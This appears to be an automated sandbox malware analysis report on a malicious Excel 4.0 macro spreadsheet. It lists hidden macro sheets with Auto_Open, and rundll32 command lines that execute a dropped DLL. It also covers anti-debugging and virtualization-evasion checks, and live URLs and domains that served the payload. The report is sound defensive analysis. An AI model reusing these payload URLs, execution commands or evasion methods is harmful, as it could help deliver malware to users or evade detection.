Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00182756 3_2_00182756
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00192B4A 3_2_00192B4A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00197D4C 3_2_00197D4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019114E 3_2_0019114E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019AF4E 3_2_0019AF4E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00182D46 3_2_00182D46
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00198D7C 3_2_00198D7C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018A17E 3_2_0018A17E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018AD68 3_2_0018AD68
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00184D6B 3_2_00184D6B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00187361 3_2_00187361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00192963 3_2_00192963
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00195198 3_2_00195198
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00187990 3_2_00187990
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018ED92 3_2_0018ED92
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019A797 3_2_0019A797
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00185D88 3_2_00185D88
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00187582 3_2_00187582
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019B587 3_2_0019B587
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019E9BB 3_2_0019E9BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001833B5 3_2_001833B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018B7B7 3_2_0018B7B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019F1AF 3_2_0019F1AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0019CFA1 3_2_0019CFA1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018EBA2 3_2_0018EBA2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00196DA4 3_2_00196DA4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001935DB 3_2_001935DB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_00194BDA 3_2_00194BDA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018E3C6 3_2_0018E3C6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001975F1 3_2_001975F1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018F1F6 3_2_0018F1F6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018FDE3 3_2_0018FDE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_001831E4 3_2_001831E4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018DBE7 3_2_0018DBE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E445900 3_2_6E445900
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E446530 3_2_6E446530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E452C20 3_2_6E452C20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E474CE0 3_2_6E474CE0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E461C80 3_2_6E461C80
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E45FC91 3_2_6E45FC91
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E442C90 3_2_6E442C90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46AA20 3_2_6E46AA20
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46FB69 3_2_6E46FB69
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E474BB3 3_2_6E474BB3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44E660 3_2_6E44E660
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E45C25A 3_2_6E45C25A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4712EC 3_2_6E4712EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E449320 3_2_6E449320
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E45C032 3_2_6E45C032
Found potential string decryption / allocating functions
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 6E454EB0 appears 49 times
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: CC15.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Abnormal high CPU Usage
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Found a hidden Excel 4.0 Macro sheet
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk2
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk5
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk1
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk7
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: EFEWF
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk3
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk4
Source: sin t#U00edtulo_0212.xlsm Macro extractor: Sheet name: Buk6
Excel documents contains an embedded macro which executes code when the document is opened
Source: workbook.xml Binary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{D6BAC37D-0CE8-4F19-A286-32FB1AEC3273}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: sin t#U00edtulo_0212.xlsm Virustotal: Detection: 22%
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nrenernv\nnave.jwm",ILDADvMws
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nrenernv\nnave.jwm",ILDADvMws Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$sin t#U00edtulo_0212.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRD9AB.tmp Jump to behavior
Source: classification engine Classification label: mal100.expl.evad.winXLSM@8/7@2/2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44AEB0 CoCreateInstance,OleRun, 3_2_6E44AEB0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.8898178241
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E44DC50 LoadLibraryExW,LoadLibraryExW,LoadLibraryExW,FindResourceW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary, 3_2_6E44DC50
Source: EXCEL.EXE, 00000000.00000002.759373114.0000000004F90000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.586705764.0000000001EA0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749938496.0000000001EA0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: Window Recorder Window detected: More than 3 window changes detected
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
Source: sin t#U00edtulo_0212.xlsm Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: CC15.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E454F00 push ecx; ret 3_2_6E454F13
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E476451 push ecx; ret 3_2_6E476464
PE file contains an invalid checksum
Source: besta.ocx.0.dr Static PE information: real checksum: 0x72da1 should be: 0x75752
Source: Z8LJs4fFM8[1].dll.0.dr Static PE information: real checksum: 0x72da1 should be: 0x75752

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Nrenernv\nnave.jwm (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Nrenernv\nnave.jwm (copy) Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\besta.ocx Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Nrenernv\nnave.jwm:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 000000006E446570 second address: 000000006E4465AB instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [esp+000000F8h], ecx 0x0000000a test edx, edx 0x0000000c jne 00007F3180DA6CC7h 0x0000000e mov dword ptr [esp+14h], 0B8FEA98h 0x00000016 rdtscp
Source: C:\Windows\SysWOW64\rundll32.exe RDTSC instruction interceptor: First address: 000000006E447835 second address: 000000006E447863 instructions: 0x00000000 rdtscp 0x00000003 mov dword ptr [ebp-08h], ecx 0x00000006 test edx, edx 0x00000008 jne 00007F3180BCE7B1h 0x0000000a mov ebx, 05F1FEE1h 0x0000000f rdtscp
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\rundll32.exe Dropped PE file which has not been started: C:\Windows\SysWOW64\Nrenernv\nnave.jwm (copy) Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Z8LJs4fFM8[1].dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E6743 rdtsc 0_2_024E6743
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 6.5 %
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46B531 FindFirstFileExA, 3_2_6E46B531
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E456FA9 IsDebuggerPresent,OutputDebugStringW, 3_2_6E456FA9
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46C928 GetProcessHeap, 3_2_6E46C928
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Code function: 0_2_024E6743 rdtsc 0_2_024E6743
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_0018DB4C mov eax, dword ptr fs:[00000030h] 3_2_0018DB4C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E446530 mov eax, dword ptr fs:[00000030h] 3_2_6E446530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E446530 mov eax, dword ptr fs:[00000030h] 3_2_6E446530
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E464E12 mov eax, dword ptr fs:[00000030h] 3_2_6E464E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E4479C0 mov eax, dword ptr fs:[00000030h] 3_2_6E4479C0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E457254 mov esi, dword ptr fs:[00000030h] 3_2_6E457254
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E46B306 mov eax, dword ptr fs:[00000030h] 3_2_6E46B306
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E454D87 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E454D87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E45453A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_6E45453A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E45D314 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_6E45D314

HIPS / PFW / Operating System Protection Evasion:

barindex
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\besta.ocx",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Nrenernv\nnave.jwm",ILDADvMws Jump to behavior
Source: EXCEL.EXE, 00000000.00000002.750116281.00000000008A0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749896992.0000000000AA0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: EXCEL.EXE, 00000000.00000002.750116281.00000000008A0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749896992.0000000000AA0000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: EXCEL.EXE, 00000000.00000002.750116281.00000000008A0000.00000002.00020000.sdmp, rundll32.exe, 00000007.00000002.749896992.0000000000AA0000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6E473FE7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E473C6E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E473C23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E473D09
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, 3_2_6E473D97
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6E473B7A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, 3_2_6E4739A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6E46C608
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW, 3_2_6E474218
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, 3_2_6E4742EB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: EnumSystemLocalesW, 3_2_6E46C0BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, 3_2_6E474110
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E454BA6 cpuid 3_2_6E454BA6
Source: C:\Windows\SysWOW64\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_6E454F17 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_6E454F17
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 532947 Sample: sin t#U00edtulo_0212.xlsm Startdate: 02/12/2021 Architecture: WINDOWS Score: 100 36 Antivirus detection for URL or domain 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Document exploit detected (drops PE files) 2->40 42 5 other signatures 2->42 8 EXCEL.EXE 53 24 2->8         started        13 svchost.exe 2->13         started        process3 dnsIp4 32 sadabahar.com.np 194.233.67.242, 49165, 80 NEXINTO-DE Germany 8->32 34 www.duoyuhudong.cn 47.96.4.95, 49166, 80 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 8->34 26 C:\Users\user\besta.ocx, PE32 8->26 dropped 28 C:\Users\user\AppData\...\Z8LJs4fFM8[1].dll, PE32 8->28 dropped 30 C:\Users\user\...\~$sin t#U00edtulo_0212.xlsm, data 8->30 dropped 46 Document exploit detected (creates forbidden files) 8->46 48 Document exploit detected (UrlDownloadToFile) 8->48 15 rundll32.exe 8->15         started        file5 signatures6 process7 signatures8 50 Tries to detect virtualization through RDTSC time measurements 15->50 18 rundll32.exe 2 15->18         started        process9 file10 24 C:\Windows\SysWOW64\...\nnave.jwm (copy), PE32 18->24 dropped 44 Hides that the sample has been downloaded from the Internet (zone.identifier) 18->44 22 rundll32.exe 18->22         started        signatures11 process12
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
47.96.4.95
 www.duoyuhudong.cn China
37963 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd false
194.233.67.242
 sadabahar.com.np Germany
6659 NEXINTO-DE false

Contacted Domains

Name IP Active
www.duoyuhudong.cn 47.96.4.95 true
sadabahar.com.np 194.233.67.242 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.duoyuhudong.cn/wp-content/we8xi/ true
  • Avira URL Cloud: malware
 unknown
http://sadabahar.com.np/wp-includes/pUMqITCt83a/ false
  • Avira URL Cloud: safe
 unknown